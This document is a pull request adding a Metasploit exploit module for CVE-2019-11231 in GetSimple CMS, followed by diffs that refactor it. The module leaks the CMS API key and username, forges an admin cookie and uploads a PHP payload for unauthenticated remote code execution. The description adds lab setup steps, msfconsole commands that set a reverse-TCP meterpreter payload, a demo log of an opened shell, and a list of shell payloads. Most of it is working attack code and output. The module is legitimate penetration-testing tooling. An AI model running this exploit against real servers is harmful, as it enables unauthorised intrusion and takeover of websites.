### PR TITLE
CVE-2019-11231 exploit: GetSimple CMS Unauth RCE

### DIFF
--- a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -13,15 +13,19 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits a vulnerability found in GetSimpleCMS,
         which allows unauthenticated attackers to perform Remote Code Execution.
+        An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,
+        however authentication can be bypassed by leaking the cms API key to target the session manager.
+        
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
-          'truerandom (twitter.com/truerand0m) @ Khalifazo' #
+          'truerand0m' #  Discovery, exploit and Metasploit from Khalifazo,incite_team
         ],
       'References'     =>
         [
           ['CVE', '2019-11231'],
+          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],          
         ],
       'Payload'        =>
         {
@@ -48,10 +52,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def gscms_version
-      if target['Version']
-        @version = target['Version']
-        return @version
-      end
       res = send_request_cgi(
         'method' => 'GET',
         'uri'    => "#{target_uri.path}/admin/"
@@ -116,32 +116,29 @@ class MetasploitModule < Msf::Exploit::Remote
     username = get_user()
     cookie = gen_cookie(version,salt,username)
     nonce = get_nonce(cookie)
-    fname = rand_text_alpha(rand(10)+6) + '.php'
+    #fname = rand_text_alpha(rand(10)+6) + '.php'
+    fname = "#{rand_text_alpha(6..16)}.php"
     php   = %Q|<?php #{payload.encoded} ?>|
     upload_file(cookie,nonce,fname,php)
-    send_request_raw({
+    send_request_cgi({
         'method' => 'GET',
         'uri'    => normalize_uri(target_uri.path,'theme',fname),
     })
-    handler
   end
 
   def check
-    checkcode = CheckCode::Safe
-    if gscms_version
-        checkcode = CheckCode::Detected
-    else
-        return CheckCode::Unknown
+    version = gscms_version
+    unless version
+        return CheckCode::Safe
     end
-    if vulnerable
-        print_good('GetSimpleCMS appears vulnerable')
-        checkcode = CheckCode::Vulnerable
+    vprint_status "GetSimpleCMS version #{version}"
+    unless vulnerable
+        return CheckCode::Detected
     end
-    checkcode
+    CheckCode::Vulnerable
   end
 
   def vulnerable
-    vulnerable = true
     uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
     res = send_request_cgi(
       'method' => 'GET',
@@ -155,7 +152,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'    => uri
     )
     return unless res && res.code == 200
-    vulnerable
+    return true
   end
 
   def upload_file(cookie,nonce,fname,content)
@@ -172,4 +169,3 @@ class MetasploitModule < Msf::Exploit::Remote
     })
   end
 end
-

--- a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
     checkcode
   end
 
-  def vulnerable()
+  def vulnerable
     vulnerable = true
     uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
     res = send_request_cgi(

--- a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -15,7 +15,6 @@ class MetasploitModule < Msf::Exploit::Remote
         which allows unauthenticated attackers to perform Remote Code Execution.
         An arbitrary file upload (PHPcode for example) vulnerability can be triggered by an authenticated user,
         however authentication can be bypassed by leaking the cms API key to target the session manager.
-        
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -25,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2019-11231'],
-          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],          
+          ['URL', 'https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution'],
         ],
       'Payload'        =>
         {

--- a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
       @version = vers
   end
 
-  def get_salt()
+  def get_salt
     uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
     res = send_request_cgi(
       'method' => 'GET',

--- a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
   end
 
-  def exploit()
+  def exploit
     unless check == CheckCode::Vulnerable
         fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
     end

--- a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @salt = res.get_xml_document.at('apikey').text
   end
 
-  def get_user()
+  def get_user
     uri = normalize_uri(target_uri.path, '/data/users/')
     res = send_request_cgi(
       'method' => 'GET',

--- a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -53,35 +53,41 @@ class MetasploitModule < Msf::Exploit::Remote
   def gscms_version
       res = send_request_cgi(
         'method' => 'GET',
-        'uri'    => "#{target_uri.path}/admin/"
+        'uri'    => normalize_uri(target_uri.path, 'admin', '/')
       )
       return unless res && res.code == 200
 
       generator = res.get_html_document.at(
         '//script[@type = "text/javascript"]/@src'
         )
+
+      fail_with(Failure::NotFound, 'Failed to retrieve generator') unless generator
       vers = generator.value.split('?v=').last.gsub(".","")
       return unless vers
       @version = vers
   end
 
   def get_salt
-    uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
+    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
     )
     return unless res && res.code == 200
+
+    fail_with(Failure::NotFound, 'Failed to retrieve salt') if res.get_xml_document.at('apikey').nil?
     @salt = res.get_xml_document.at('apikey').text
   end
 
   def get_user
-    uri = normalize_uri(target_uri.path, '/data/users/')
+    uri = normalize_uri(target_uri.path, 'data', 'users' ,'/')
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
     )
     return unless res && res.code == 200
+
+    fail_with(Failure::NotFound, 'Failed to retrieve username') if res.get_html_document.at('[text()*="xml"]').nil?
     @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
   end
 
@@ -94,15 +100,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
   def get_nonce(cookie)
     res = send_request_cgi({
-    'method' => 'GET',
-    'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
-    'cookie' =>  cookie,
-    'vars_get' => {
-        't' => 'Innovation',
-        'f' => 'Default Template',
-        's' => 'Edit'
-    }
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
+      'cookie' =>  cookie,
+      'vars_get' => {
+          't' => 'Innovation',
+          'f' => 'Default Template',
+          's' => 'Edit'
+      }
     })
+
+    fail_with(Failure::NotFound, 'Failed to retrieve nonce') if res.get_html_document.at('//input[@id = "nonce"]/@value').nil?
     @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
   end
 
@@ -111,11 +119,11 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
     end
     version = gscms_version
-    salt = get_salt()
-    username = get_user()
+    salt = get_salt
+    username = get_user
     cookie = gen_cookie(version,salt,username)
     nonce = get_nonce(cookie)
-    #fname = rand_text_alpha(rand(10)+6) + '.php'
+
     fname = "#{rand_text_alpha(6..16)}.php"
     php   = %Q|<?php #{payload.encoded} ?>|
     upload_file(cookie,nonce,fname,php)
@@ -138,14 +146,14 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def vulnerable
-    uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
+    uri = normalize_uri(target_uri.path, 'data', 'other', 'authorization.xml')
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri
     )
     return unless res && res.code == 200
 
-    uri = normalize_uri(target_uri.path, '/data/users/')
+    uri = normalize_uri(target_uri.path, 'data', 'users', '/')
     res = send_request_cgi(
       'method' => 'GET',
       'uri'    => uri

--- a/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
+++ b/modules/exploits/multi/http/getsimplecms_unauth_code_exec.rb
@@ -1,0 +1,175 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "GetSimpleCMS Unauthenticated RCE",
+      'Description'    => %q{
+        This module exploits a vulnerability found in GetSimpleCMS,
+        which allows unauthenticated attackers to perform Remote Code Execution.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'truerandom (twitter.com/truerand0m) @ Khalifazo' #
+        ],
+      'References'     =>
+        [
+          ['CVE', '2019-11231'],
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x00"
+        },
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['GetSimpleCMS 3.3.15 and before', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 28 2019",
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the cms', '/'])
+      ])
+  end
+
+  def gscms_version
+      if target['Version']
+        @version = target['Version']
+        return @version
+      end
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => "#{target_uri.path}/admin/"
+      )
+      return unless res && res.code == 200
+
+      generator = res.get_html_document.at(
+        '//script[@type = "text/javascript"]/@src'
+        )
+      vers = generator.value.split('?v=').last.gsub(".","")
+      return unless vers
+      @version = vers
+  end
+
+  def get_salt()
+    uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+    @salt = res.get_xml_document.at('apikey').text
+  end
+
+  def get_user()
+    uri = normalize_uri(target_uri.path, '/data/users/')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+    @username = res.get_html_document.at('[text()*="xml"]').text.split('.xml').first
+  end
+
+  def gen_cookie(version,salt,username)
+    cookie_name = "getsimple_cookie_#{version}"
+    sha_salt_usr = Digest::SHA1.hexdigest("#{username}#{salt}")
+
+    sha_salt_cookie = Digest::SHA1.hexdigest("#{cookie_name}#{salt}")
+    @cookie = "GS_ADMIN_USERNAME=#{username};#{sha_salt_cookie}=#{sha_salt_usr}"
+  end
+  def get_nonce(cookie)
+    res = send_request_cgi({
+    'method' => 'GET',
+    'uri' => normalize_uri(target_uri,'admin','theme-edit.php'),
+    'cookie' =>  cookie,
+    'vars_get' => {
+        't' => 'Innovation',
+        'f' => 'Default Template',
+        's' => 'Edit'
+    }
+    })
+    @nonce = res.get_html_document.at('//input[@id = "nonce"]/@value')
+  end
+
+  def exploit()
+    unless check == CheckCode::Vulnerable
+        fail_with(Failure::NotVulnerable, 'It appears that the target is not vulnerable')
+    end
+    version = gscms_version
+    salt = get_salt()
+    username = get_user()
+    cookie = gen_cookie(version,salt,username)
+    nonce = get_nonce(cookie)
+    fname = rand_text_alpha(rand(10)+6) + '.php'
+    php   = %Q|<?php #{payload.encoded} ?>|
+    upload_file(cookie,nonce,fname,php)
+    send_request_raw({
+        'method' => 'GET',
+        'uri'    => normalize_uri(target_uri.path,'theme',fname),
+    })
+    handler
+  end
+
+  def check
+    checkcode = CheckCode::Safe
+    if gscms_version
+        checkcode = CheckCode::Detected
+    else
+        return CheckCode::Unknown
+    end
+    if vulnerable
+        print_good('GetSimpleCMS appears vulnerable')
+        checkcode = CheckCode::Vulnerable
+    end
+    checkcode
+  end
+
+  def vulnerable()
+    vulnerable = true
+    uri = normalize_uri(target_uri.path, '/data/other/authorization.xml')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+
+    uri = normalize_uri(target_uri.path, '/data/users/')
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => uri
+    )
+    return unless res && res.code == 200
+    vulnerable
+  end
+
+  def upload_file(cookie,nonce,fname,content)
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path,'admin','theme-edit.php'),
+      'cookie'    => cookie,
+      'vars_post' => {
+        'submitsave'    => 2,
+        'edited_file' => fname,
+        'content' => content,
+        'nonce' => nonce
+      }
+    })
+  end
+end
+


### PR DESCRIPTION
Hi this is a pull request for the module that exploits
CVE-2019-11231 
(https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution)
## Vulnerable application
GetSimple CMS http://get-simple.info

## Vulnerable setup
```
apt-get update
apt-get install apache2 php5 php5-curl php5-gd -y 
a2enmod rewrite
service apache2 restart
cd /var/www/html
wget http://get-simple.info/latest -O getsimplecms.zip
unzip -u getsimplecms.zip
mv GetSimpleCMS-3.3.15/ /var/www/html/getsimplecms
mv /var/www/html/getsimplecms/temp.gsconfig.php /var/www/html/getsimplecms/gsconfig.php
chown -R www-data:www-data /var/www/html/getsimplecms
chmod -R 755 /var/www/html/getsimplecms/
```
configure cms at `http://localhost/getsimplecms/admin/install.php`
Tested on ` Apache/2.4.10 (Debian)`

## Verification
Launch metasploit and set the appropiate options:
- [ ] Start `msfconsole`
- [ ] ```use exploit/multi/http/getsimplecms_unauth_code_exec```
- [ ] ```set RHOST xxx```
- [ ] ```set TARGETURI /xxx/```
- [ ] ```set payload php/meterpreter/reverse_tcp```
- [ ] ```exploit```

## Demo
```
msf > use exploit/multi/http/getsimplecms_unauth_code_exec
msf exploit(multi/http/getsimplecms_unauth_code_exec) > set RHOST 192.168.230.130
msf exploit(multi/http/getsimplecms_unauth_code_exec) > set TARGETURI /getsimplecms/
msf exploit(multi/http/getsimplecms_unauth_code_exec) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/http/getsimplecms_unauth_code_exec) > set LHOST 192.168.230.128
msf exploit(multi/http/getsimplecms_unauth_code_exec) > check
[+] GetSimpleCMS appears vulnerable
[+] 192.168.230.130:80 The target is vulnerable.
msf exploit(multi/http/getsimplecms_unauth_code_exec) > exploit 

[*] Started reverse TCP handler on 192.168.230.128:4444 
[+] GetSimpleCMS appears vulnerable
[*] Sending stage (37775 bytes) to 192.168.230.130
[*] Meterpreter session 1 opened (192.168.230.128:4444 -> 192.168.230.130:54923) at 2019-05-02 02:13:10 -0400
meterpreter > getuid
Server username: www-data (33)
meterpreter > pwd
/var/www/html/getsimplecms/theme
meterpreter > sysinfo
Computer    : chaos
OS          : Linux chaos 3.16.0-4-amd64 #1 SMP Debian 3.16.51-2 (2017-12-03) x86_64
Meterpreter : php/linux
```

## Compatible payloads
  ```
Compatible Payloads
===================

   Name                                Disclosure Date  Rank    Description
   ----                                ---------------  ----    -----------
   generic/custom                                       normal  Custom Payload
   generic/shell_bind_tcp                               normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                            normal  Generic Command Shell, Reverse TCP Inline
   php/bind_perl                                        normal  PHP Command Shell, Bind TCP (via Perl)
   php/bind_perl_ipv6                                   normal  PHP Command Shell, Bind TCP (via perl) IPv6
   php/bind_php                                         normal  PHP Command Shell, Bind TCP (via PHP)
   php/bind_php_ipv6                                    normal  PHP Command Shell, Bind TCP (via php) IPv6
   php/download_exec                                    normal  PHP Executable Download and Execute
   php/exec                                             normal  PHP Execute Command 
   php/meterpreter/bind_tcp                             normal  PHP Meterpreter, Bind TCP Stager
   php/meterpreter/bind_tcp_ipv6                        normal  PHP Meterpreter, Bind TCP Stager IPv6
   php/meterpreter/bind_tcp_ipv6_uuid                   normal  PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   php/meterpreter/bind_tcp_uuid                        normal  PHP Meterpreter, Bind TCP Stager with UUID Support
   php/meterpreter/reverse_tcp                          normal  PHP Meterpreter, PHP Reverse TCP Stager
   php/meterpreter/reverse_tcp_uuid                     normal  PHP Meterpreter, PHP Reverse TCP Stager
   php/meterpreter_reverse_tcp                          normal  PHP Meterpreter, Reverse TCP Inline
   php/reverse_perl                                     normal  PHP Command, Double Reverse TCP Connection (via Perl)
   php/reverse_php                                      normal  PHP Command Shell, Reverse TCP (via PHP)
```
## How it works 
https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
